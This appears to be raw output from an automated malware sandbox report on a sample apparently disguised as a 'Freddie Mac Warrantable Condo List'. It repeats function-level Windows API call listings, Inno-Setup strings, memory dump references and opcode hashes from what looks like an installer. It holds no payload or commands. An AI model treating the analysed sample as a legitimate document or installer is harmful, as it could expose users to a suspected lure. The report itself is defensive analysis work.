DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62
SetLastError.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A70

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorFileLast$AttributesDeleteDirectoryRemove
String ID:
API String ID: 2814369299-0
Opcode ID: c3bc70216ec4533fa759fff64f9e0cfdb1100a6f726ccddcc5e522493d267f4f
Instruction ID: b6ddb16581f5c3c7179c90d7d3f79c6d55466118c1baf1b24a27a0798ed1e7de
Opcode Fuzzy Hash: c3bc70216ec4533fa759fff64f9e0cfdb1100a6f726ccddcc5e522493d267f4f
Instruction Fuzzy Hash: FAF0A7613803241999203DBE28C9ABF115CC9427AFB54077FF994D22D2D62D5F87415D

Uniqueness

Uniqueness Score: -1.00%

Function 005B631C, Relevance: 7.5, APIs: 5, Instructions: 39threadCOMMON

Download Yara Rule

APIs

UnhookWindowsHookEx.USER32(00000000), ref: 005B632E
SetEvent.KERNEL32(00000000), ref: 005B635A
GetCurrentThreadId.KERNEL32 ref: 005B635F
MsgWaitForMultipleObjects.USER32 ref: 005B6388
CloseHandle.KERNEL32(00000000,00000000), ref: 005B6395

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CloseCurrentEventHandleHookMultipleObjectsThreadUnhookWaitWindows
String ID:
API String ID: 2132507429-0
Opcode ID: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
Instruction ID: 777aa0f60006170efd8bf97b8faec0e2cbbea874aebe53a0ac6f8c30ff2fdbbe
Opcode Fuzzy Hash: 3d70fa8801357980af144d8f96a13d0436440f37400d9bd4b324e4fa6e60107c
Instruction Fuzzy Hash: 30018B70A09700EED700EB65DC45BAE37E9FB44715F604A2AF055C75D0DB38A480CB42

Uniqueness

Uniqueness Score: -1.00%

Function 006B8F64, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE,?,?), ref: 006B8FD4
SetFileAttributesW.KERNEL32(00000000,00000000,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000,006B94CE), ref: 006B8FFD
MoveFileExW.KERNEL32(00000000,00000000,00000001,00000000,000000EC,00000000,006B9062,?,?,006D579C,?,006B9494,00000000,006B949E,?,00000000), ref: 006B9016

Strings

isRS-%.3u.tmp, xrefs: 006B8FB3

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: File$Attributes$Move
String ID: isRS-%.3u.tmp
API String ID: 3839737484-3657609586
Opcode ID: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
Instruction ID: 31d351f3c97924346b89867796ea0414510024315a00da88274a448b23120628
Opcode Fuzzy Hash: f1af534764baa85caf1b981574ad6383839b7439e06e2967b69f80573a92c814
Instruction Fuzzy Hash: AB318170D04218ABCB00EBB9C8859EEB7B9EF48314F51467EF814B7281D7385E818769

Uniqueness

Uniqueness Score: -1.00%

Function 0060C038, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 0060C08C
GetLastError.KERNEL32(00000000,00000000,006D579C,?,?,XMb,00000000,>Mb,?,00000000,00000000,0060C0B2,?,?,00000000,00000001), ref: 0060C094

Strings

>Mb, xrefs: 0060C072, 0060C075
XMb, xrefs: 0060C07A, 0060C07D

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CreateErrorLastProcess
String ID: >Mb$XMb
API String ID: 2919029540-2660256435
Opcode ID: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
Instruction ID: 6fed8a1d79b3fe7fb7c31d778b9d5703ccb9eb2a1393ada51090ba1ca1dee2d9
Opcode Fuzzy Hash: fc70ad85d2157d21ba367755dea5396487fa079e60854658823ca55dcf81e298
Instruction Fuzzy Hash: DA113972640208AFCB54DFA9DC81DDFB7ECEB4D320B518666F908D3280D635AE108BA4

Uniqueness

Uniqueness Score: -1.00%

Function 006B6998, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 59processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32 ref: 006B6A05
CloseHandle.KERNEL32(006B6AB0,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,006B6A6C,?,006B6A5C,00000000), ref: 006B6A22

Part of subcall function 006B68EC: GetLastError.KERNEL32(00000000,006B6989,?,?,?), ref: 006B690F

Strings

D, xrefs: 006B69DF
(\m, xrefs: 006B6A0E

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CloseCreateErrorHandleLastProcess
String ID: (\m$D
API String ID: 3798668922-1981685662
Opcode ID: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
Instruction ID: 5a29f4a3f67f8962990b16f59edcecd6c92ec2fdb2b6e45770094aa6b13b7383
Opcode Fuzzy Hash: a5833d7c80436315819c56a95c2be4cf65ccd9a37b43d1b18280e5cc74a4d4a7
Instruction Fuzzy Hash: 53115EB1604248AFDB00EBA5CC92EEE77ADEF08704F51407AF505F7281E678AE448768

Uniqueness

Uniqueness Score: -1.00%

Function 0062460C, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005C52C8: GetFullPathNameW.KERNEL32(00000000,00001000,?,?,00000002,?,?,006D579C,00000000,0060D8F7,00000000,0060DBD2,?,?,006D579C), ref: 005C52F9

LoadTypeLib.OLEAUT32(00000000,00000000), ref: 0062464F
RegisterTypeLib.OLEAUT32(?,00000000,00000000), ref: 0062466B

Strings

LoadTypeLib, xrefs: 0062465A
RegisterTypeLib, xrefs: 00624676

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Type$FullLoadNamePathRegister
String ID: LoadTypeLib$RegisterTypeLib
API String ID: 4170313675-2435364021
Opcode ID: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
Instruction ID: a0643c8b31b351ed7dd0ed5e96a0399ab73b0cd2583ebe073036f576505b33dd
Opcode Fuzzy Hash: 4a5734cba4f1f567cfe39a2ea32e2412489323ff365467ecfcfbb8db8d726f7e
Instruction Fuzzy Hash: 2D0148317407146BDB10EBB6DC82F8E77EDDB49704F514876B400F62D2DE78AE058A58

Uniqueness

Uniqueness Score: -1.00%

Function 0060DAE9, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41fileCOMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNEL32(00000000,00000020), ref: 0060DAF4

Part of subcall function 00423A20: DeleteFileW.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A30
Part of subcall function 00423A20: GetLastError.KERNEL32(00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex), ref: 00423A3F
Part of subcall function 00423A20: GetFileAttributesW.KERNEL32(00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000,00000000), ref: 00423A47
Part of subcall function 00423A20: RemoveDirectoryW.KERNEL32(00000000,00000000,00000000,?,?,006D579C,?,006B9479,00000000,006B94CE,?,?,00000005,?,00000000,00000000), ref: 00423A62

MoveFileW.KERNEL32(00000000,00000000), ref: 0060DB21

Part of subcall function 0060CE84: GetLastError.KERNEL32(00000000,0060DBAA,00000005,00000000,0060DBD2,?,?,006D579C,?,00000000,00000000,00000000,?,006B910F,00000000,006B912A), ref: 0060CE87

Strings

DeleteFile, xrefs: 0060DB05
MoveFile, xrefs: 0060DB2A

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: File$AttributesErrorLast$DeleteDirectoryMoveRemove
String ID: DeleteFile$MoveFile
API String ID: 3947864702-139070271
Opcode ID: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
Instruction ID: fe212bc12655be3e3d7d94ed230904773b29f806c55adb2c37bf9887ca86c235
Opcode Fuzzy Hash: 28384db22342baecc380df85cc8e828356bddb25a27468d4207e88f44f6ce01a
Instruction Fuzzy Hash: 62F044706841058AEB08FBF6E9069AF73A5EF44318F51467EF404E72C1DA3C9C05862D

Uniqueness

Uniqueness Score: -1.00%

Function 004698FC, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 107COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 0046998A

Part of subcall function 004236A4: CreateFileW.KERNEL32(00000000,000000F0,000000F0,00000000,00000003,00000080,00000000,?,?,00443D4C,004699CC,00000000,00469A4C,?,?,00443D4C), ref: 004236F3

Part of subcall function 00423BD0: GetFullPathNameW.KERNEL32(00000000,00000104,?,?,?,?,?,00443D4C,004699E7,00000000,00469A4C,?,?,00443D4C,00000001), ref: 00423BF3

GetLastError.KERNEL32(00000000,00469A4C,?,?,00443D4C,00000001), ref: 004699F1

Part of subcall function 00427D54: FormatMessageW.KERNEL32(00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427D78
Part of subcall function 00427D54: LocalFree.KERNEL32(00000001,00427DD1,00003300,00000000,00000000,00000000,00000001,00000000,00000000,?,00443D4C,00000000,?,00469A00,00000000,00469A4C), ref: 00427DC4

Strings

dUA, xrefs: 00469A10
\UA, xrefs: 004699A9

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ErrorLast$CreateFileFormatFreeFullLocalMessageNamePath
String ID: \UA$dUA
API String ID: 503893064-3864016770
Opcode ID: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
Instruction ID: 123e0454fb2a9dec89cd9e8203dbd653fcf04e778e7e37e714b9737e464d7bf3
Opcode Fuzzy Hash: b0b121723ddee52f030030255f4b80514a6c0ed541d556e71d6ab1a2d84e7d43
Instruction Fuzzy Hash: 8641A370B002599FDB00EFA6C8815EEBBF5AF58314F40812AE914A7382D77D5E05CB6A

Uniqueness

Uniqueness Score: -1.00%

Function 0040DE74, Relevance: 6.1, APIs: 4, Instructions: 95threadCOMMON

Download Yara Rule

APIs

GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040DE85
SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040DEE3
SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040DF40
SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040DF73

Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040DEF1), ref: 0040DE47
Part of subcall function 0040DE30: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040DEF1), ref: 0040DE64

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Thread$LanguagesPreferred$Language
String ID:
API String ID: 2255706666-0
Opcode ID: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
Instruction ID: 69b1dabfcf83cd92044bbbe7d095353c7cd2b80021ffbfb9d1b785f1729ac455
Opcode Fuzzy Hash: 7b6831f497646e761f52de9c536b6e12a9bbcbfaf2b29159977432e5b56d760a
Instruction Fuzzy Hash: 63317070E1021A9BCB10DFE9D884AAEB7B5FF14305F40417AE516FB2D1D7789A09CB94

Uniqueness

Uniqueness Score: -1.00%

Function 005B9590, Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32 ref: 005B95A3
GetWindowLongW.USER32(?,000000EC), ref: 005B95E5
SetWindowLongW.USER32 ref: 005B95FF
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,C31852FF,?,00000000,?,005B96B9,?,?,?,00000000), ref: 005B9627

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Window$Long$Visible
String ID:
API String ID: 2967648141-0
Opcode ID: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
Instruction ID: de5a40ccb5800a4cef2b87037ee72a09c9fd5293aebedbf233be07227e7c069f
Opcode Fuzzy Hash: b7a1436f9b319cac24e08ad551a1c75daf269ab9656b7f3b572d445cccf1e1b8
Instruction Fuzzy Hash: B31161742851446FDB00DB28D888FFA7FE9AB45324F458191F988CB362CA38ED80CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0046A218, Relevance: 6.1, APIs: 4, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceW.KERNEL32(?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?,?,006AC890), ref: 0046A22F
LoadResource.KERNEL32(?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000,?,006D579C,?), ref: 0046A249
SizeofResource.KERNEL32(?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000,00000000), ref: 0046A263
LockResource.KERNEL32(00469B00,00000000,?,0046A2B4,?,0046A2B4,?,?,?,00444A50,?,00000001,00000000,?,0046A15A,00000000), ref: 0046A26D

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
Instruction ID: abb9b97bb193dfeb05d9d82a7f41705a61c143c3b7d9841fcbe573c2d8062a85
Opcode Fuzzy Hash: c0a3742649e4821bf1d8e39dd4131d6b260b263a11f53cd498264533ba18d33a
Instruction Fuzzy Hash: C4F081B36406046F5745EE9DA881DAB77ECEE89364310015FF908D7302EA39DD51477A

Uniqueness

Uniqueness Score: -1.00%

Function 0050E958, Relevance: 6.0, APIs: 4, Instructions: 35threadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000), ref: 0050E965
GetCurrentProcessId.KERNEL32(?,00000000,00000000,005BA39A,?,?,00000000,00000001,005B8697,?,00000000,00000000,00000000,00000001,?,00000000), ref: 0050E96E
GlobalFindAtomW.KERNEL32(00000000), ref: 0050E983
GetPropW.USER32 ref: 0050E99A

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
